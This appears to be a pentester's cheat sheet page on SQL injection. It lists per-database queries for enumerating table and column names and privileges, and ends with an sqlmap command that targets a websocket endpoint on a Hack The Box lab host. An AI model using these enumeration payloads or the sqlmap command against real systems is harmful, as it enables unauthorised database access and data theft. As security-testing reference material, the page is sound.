Skip to content

SQL Injection

Extract table and column names

Oracle

SELECT LISTAGG(table_name, ',') FROM all_tables

SELECT LISTAGG(column_name, ',') FROM all_tab_columns
WHERE table_name = 'TABLE-NAME-HERE'

Microsoft

SELECT STRING_AGG(table_name, CHAR(44)) FROM information_schema.tables

SELECT STRING_AGG(column_name, CHAR(44)) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'

PostgreSQL

SELECT STRING_AGG(table_name, ',') FROM information_schema.tables

SELECT STRING_AGG(column_name, ',') FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'

MySQL

SELECT GROUP_CONCAT(table_name) FROM information_schema.tables

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'`

References portswigger.net - cheatsheet.

Privileges

MySQL

SHOW GRANTS;

Others

MySQL

Use --vertical to enable the vertical format or ending query with \G, example : SELECT * FROM users \G.

> SELECT * FROM city WHERE countrycode='AUT';
*************************** 1. row ***************************
    ID: 1523
    Name: Wien
    CountryCode: AUT
    District: Wien
    Info: {"Population": 1608144}

Source dev.mysql.com.

SQL Injection in Websockets

Example of command using SQLmap :

$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"57636*"}'

Another way would be to use an HTTP server as proxy: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html